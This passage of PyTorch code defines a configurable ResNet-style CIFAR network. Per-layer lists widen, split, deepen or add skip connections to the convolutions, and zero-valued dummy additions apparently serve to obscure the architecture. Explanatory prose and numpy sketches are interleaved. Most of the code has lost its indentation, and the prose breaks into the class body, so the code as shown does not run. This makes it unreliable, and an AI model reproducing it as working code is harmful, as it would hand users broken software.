                self.conv27_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
                self.conv27_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
            else:
                self.conv27 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        else:
            self.conv27 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
        if self.deepen_list is not None:
            if self.deepen_list[27] == 1:
                self.conv27_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
        if self.skipcon_list is not None:
            if self.skipcon_list[27] == 1:
                self.conv27_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn27 = torch.nn.BatchNorm2d(params[1])
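The widen branches all use the same rounding rule, `int(np.floor(c * w / 4) * 4)`: scale the channel count, then round down to a multiple of 4. A short sketch of that rule in isolation:

```python
import numpy as np

# Widening multiplies a channel count and rounds down to a multiple
# of 4, matching int(np.floor(c * w / 4) * 4) used in the widen lists.
def widen(c, w):
    return int(np.floor(c * w / 4) * 4)

assert widen(64, 1.5) == 96
assert widen(64, 1.1) == 68   # 70.4 -> floor(17.6) * 4 = 68
assert widen(64, 1.0) == 64
```

Rounding to a multiple of 4 keeps the widened channel count compatible with the 2-way and 4-way decompositions used elsewhere.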
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[27] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[27] / 4) * 4)
if self.widen_list[28] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[28] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[28] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[28])
params[3] = params[3] + 2* int(self.kerneladd_list[28])
params[6] = params[6] + int(self.kerneladd_list[28])
params[7] = params[7] + int(self.kerneladd_list[28])
if self.decompo_list != None:
if self.decompo_list[28] == 1:
self.conv28_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[28] == 2:
self.conv28_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[28] == 3:
self.conv28_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[28] == 4:
self.conv28_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv28_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv28 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv28 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[28] == 1:
self.conv28_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[28] == 1:
self.conv28_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn28 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[28] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[28] / 4) * 4)
if self.widen_list[29] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[29] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[29] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[29])
params[3] = params[3] + 2* int(self.kerneladd_list[29])
params[6] = params[6] + int(self.kerneladd_list[29])
params[7] = params[7] + int(self.kerneladd_list[29])
if self.decompo_list != None:
if self.decompo_list[29] == 1:
self.conv29_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[29] == 2:
self.conv29_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[29] == 3:
self.conv29_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[29] == 4:
self.conv29_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv29_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv29 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv29 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[29] == 1:
self.conv29_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[29] == 1:
self.conv29_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn29 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[29] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[29] / 4) * 4)
if self.widen_list[30] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[30] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[30] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[30])
params[3] = params[3] + 2* int(self.kerneladd_list[30])
params[6] = params[6] + int(self.kerneladd_list[30])
params[7] = params[7] + int(self.kerneladd_list[30])
if self.decompo_list != None:
if self.decompo_list[30] == 1:
self.conv30_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[30] == 2:
self.conv30_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[30] == 3:
self.conv30_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[30] == 4:
self.conv30_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv30_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv30 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv30 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[30] == 1:
self.conv30_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[30] == 1:
self.conv30_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn30 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[30] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[30] / 4) * 4)
if self.widen_list[31] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[31] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[31] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[31])
params[3] = params[3] + 2* int(self.kerneladd_list[31])
params[6] = params[6] + int(self.kerneladd_list[31])
params[7] = params[7] + int(self.kerneladd_list[31])
if self.decompo_list != None:
if self.decompo_list[31] == 1:
self.conv31_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[31] == 2:
self.conv31_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[31] == 3:
self.conv31_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[31] == 4:
self.conv31_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv31_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv31 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv31 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[31] == 1:
self.conv31_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[31] == 1:
self.conv31_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn31 = torch.nn.BatchNorm2d(params[1])
params = [64, 64, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[31] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[31] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[32] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[32])
params[3] = params[3] + 2* int(self.kerneladd_list[32])
params[6] = params[6] + int(self.kerneladd_list[32])
params[7] = params[7] + int(self.kerneladd_list[32])
if self.decompo_list != None:
if self.decompo_list[32] == 1:
self.conv32_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[32] == 2:
self.conv32_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[32] == 3:
self.conv32_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[32] == 4:
self.conv32_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv32_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv32 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv32 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[32] == 1:
self.conv32_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[32] == 1:
self.conv32_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn32 = torch.nn.BatchNorm2d(params[1])
params = [64, 10]  # [in_features, num_classes]
if self.widen_list != None:
pass  # classifier width is fixed; nothing to widen here
if self.decompo_list != None:
if self.decompo_list[33] == 1:
self.classifier_0 = torch.nn.Linear(params[0], int(params[1]/2))
self.classifier_1 = torch.nn.Linear(params[0], int(params[1]/2))
elif self.decompo_list[33] == 3:
self.classifier_0 = torch.nn.Linear(int(params[0]/2), params[1])
self.classifier_1 = torch.nn.Linear(int(params[0]/2), params[1])
elif self.decompo_list[33] == 4:
self.classifier_0 = torch.nn.Linear(int(params[0]/4), params[1])
self.classifier_1 = torch.nn.Linear(int(params[0]/4), params[1])
self.classifier_2 = torch.nn.Linear(int(params[0]/4), params[1])
self.classifier_3 = torch.nn.Linear(int(params[0]/4), params[1])
else:
self.classifier = torch.nn.Linear(params[0], params[1])
else:
self.classifier = torch.nn.Linear(params[0], params[1])
if self.deepen_list != None:
if self.deepen_list[33] == 1:
self.classifier_dp = torch.nn.Linear(params[1], params[1])
if self.skipcon_list != None:
if self.skipcon_list[33] == 1:
self.classifier_sk = torch.nn.Linear(params[1], params[1])
self.reset_parameters(input_features)
def reset_parameters(self, input_features):
# Uniform init over every parameter, BatchNorm scales and biases included.
stdv = 1.0 / math.sqrt(input_features)
for weight in self.parameters():
weight.data.uniform_(-stdv, stdv)
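`reset_parameters` draws every parameter from a uniform distribution bounded by `1/sqrt(input_features)`. A minimal numpy sketch of that bound (the `3 * 32 * 32` input size is an assumption for a CIFAR-style input, not taken from this file):

```python
import math
import numpy as np

# Same bound as reset_parameters: stdv = 1 / sqrt(input_features).
input_features = 3 * 32 * 32          # hypothetical CIFAR-style input
stdv = 1.0 / math.sqrt(input_features)

rng = np.random.default_rng(0)
w = rng.uniform(-stdv, stdv, size=(64, 3, 3, 3))
assert np.all(np.abs(w) <= stdv)
```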
def forward(self, X1):
if self.reshape:
X1 = X1.reshape(-1, 3, 32, 32)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[0] == 1:
X1_0 = self.conv0_0(X1)
X1_1 = self.conv0_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[0] == 2:
X1_0 = self.conv0_0(X1)
X1_1 = self.conv0_1(X1)
X1_2 = self.conv0_2(X1)
X1_3 = self.conv0_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
else:
X1 = self.conv0(X1)
else:
X1 = self.conv0(X1)
if self.dummy_list != None:
if self.dummy_list[0] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[0]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
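Each `dummy_list` entry triggers repeated additions of an all-zero tensor: the activations are numerically unchanged, only extra operations are executed. A numpy sketch of the identity:

```python
import numpy as np

# Each dummy op adds an all-zero tensor: extra work, identical values.
x = np.arange(12, dtype=np.float32).reshape(1, 3, 2, 2)
dummy = np.zeros(x.shape, dtype=np.float32)
y = x.copy()
for _ in range(5):                   # e.g. a dummy_list entry of 5
    y = y + dummy
assert np.array_equal(x, y)
```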
X1 = self.conv_bn0(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[0] == 1:
X1 = self.conv0_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[0] == 1:
X1_skip = X1
X1 = self.conv0_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[1] == 1:
X1_0 = self.conv1_0(X1)
X1_1 = self.conv1_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[1] == 2:
X1_0 = self.conv1_0(X1)
X1_1 = self.conv1_1(X1)
X1_2 = self.conv1_2(X1)
X1_3 = self.conv1_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[1] == 3:
X1_0 = self.conv1_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv1_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[1] == 4:
X1_0 = self.conv1_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv1_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv1_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv1_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv1(X1)
else:
X1 = self.conv1(X1)
if self.dummy_list != None:
if self.dummy_list[1] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[1]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn1(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[1] == 1:
X1 = self.conv1_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[1] == 1:
X1_skip = X1
X1 = self.conv1_sk(X1)
X1 = self.relu(X1 + X1_skip)
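Decompo modes 1 and 2 above split a layer along its output channels and concatenate the results. The equivalence is easiest to see for a linear map: running two half-width maps whose weights are the row blocks of the full weight, then concatenating, reproduces the full map. A numpy sketch:

```python
import numpy as np

# decompo modes 1/2 split the *output* channels: two half-width maps,
# concatenated, match one full-width map when the weights are the
# corresponding row blocks of the full weight matrix.
rng = np.random.default_rng(0)
W = rng.standard_normal((64, 16))    # full weight: 64 outputs, 16 inputs
x = rng.standard_normal(16)

full = W @ x
halves = np.concatenate([W[:32] @ x, W[32:] @ x])
assert np.allclose(full, halves)
```

The same block structure applies channel-wise to the `conv*_0`/`conv*_1` pairs, each producing `out_ch/2` feature maps that `torch.cat(..., 1)` stitches back together.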
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[2] == 1:
X1_0 = self.conv2_0(X1)
X1_1 = self.conv2_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[2] == 2:
X1_0 = self.conv2_0(X1)
X1_1 = self.conv2_1(X1)
X1_2 = self.conv2_2(X1)
X1_3 = self.conv2_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[2] == 3:
X1_0 = self.conv2_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv2_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[2] == 4:
X1_0 = self.conv2_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv2_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv2_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv2_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv2(X1)
else:
X1 = self.conv2(X1)
if self.dummy_list != None:
if self.dummy_list[2] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[2]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn2(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[2] == 1:
X1 = self.conv2_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[2] == 1:
X1_skip = X1
X1 = self.conv2_sk(X1)
X1 = self.relu(X1 + X1_skip)
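Decompo modes 3 and 4 instead split the *input* channels: each sub-layer sees a channel slice and the partial outputs are summed. Again in linear-map form, slicing the columns of the weight and adding the partial products recovers the full result:

```python
import numpy as np

# decompo modes 3/4 split the *input* channels: each sub-layer sees a
# channel slice, and summing the partial outputs matches the full map.
rng = np.random.default_rng(1)
W = rng.standard_normal((10, 64))    # full weight: 10 outputs, 64 inputs
x = rng.standard_normal(64)

full = W @ x
parts = W[:, :32] @ x[:32] + W[:, 32:] @ x[32:]
assert np.allclose(full, parts)
```

In the conv versions above, the slices are taken with `torch.floor_divide(X1_shape[1], 2)` (or `4`) along dim 1, and the sub-results are combined with `torch.add` or `+` rather than `torch.cat`.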
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[3] == 1:
X1_0 = self.conv3_0(X1)
X1_1 = self.conv3_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[3] == 2:
X1_0 = self.conv3_0(X1)
X1_1 = self.conv3_1(X1)
X1_2 = self.conv3_2(X1)
X1_3 = self.conv3_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[3] == 3:
X1_0 = self.conv3_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv3_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[3] == 4:
X1_0 = self.conv3_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv3_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv3_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv3_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv3(X1)
else:
X1 = self.conv3(X1)
if self.dummy_list != None:
if self.dummy_list[3] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[3]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn3(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[3] == 1:
X1 = self.conv3_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[3] == 1:
X1_skip = X1
X1 = self.conv3_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[4] == 1:
X1_0 = self.conv4_0(X1)
X1_1 = self.conv4_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[4] == 2:
X1_0 = self.conv4_0(X1)
X1_1 = self.conv4_1(X1)
X1_2 = self.conv4_2(X1)
X1_3 = self.conv4_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[4] == 3:
X1_0 = self.conv4_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv4_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[4] == 4:
X1_0 = self.conv4_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv4_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv4_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv4_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv4(X1)
else:
X1 = self.conv4(X1)
if self.dummy_list != None:
if self.dummy_list[4] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[4]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn4(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[4] == 1:
X1 = self.conv4_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[4] == 1:
X1_skip = X1
X1 = self.conv4_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[5] == 1:
X1_0 = self.conv5_0(X1)
X1_1 = self.conv5_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[5] == 2:
X1_0 = self.conv5_0(X1)
X1_1 = self.conv5_1(X1)
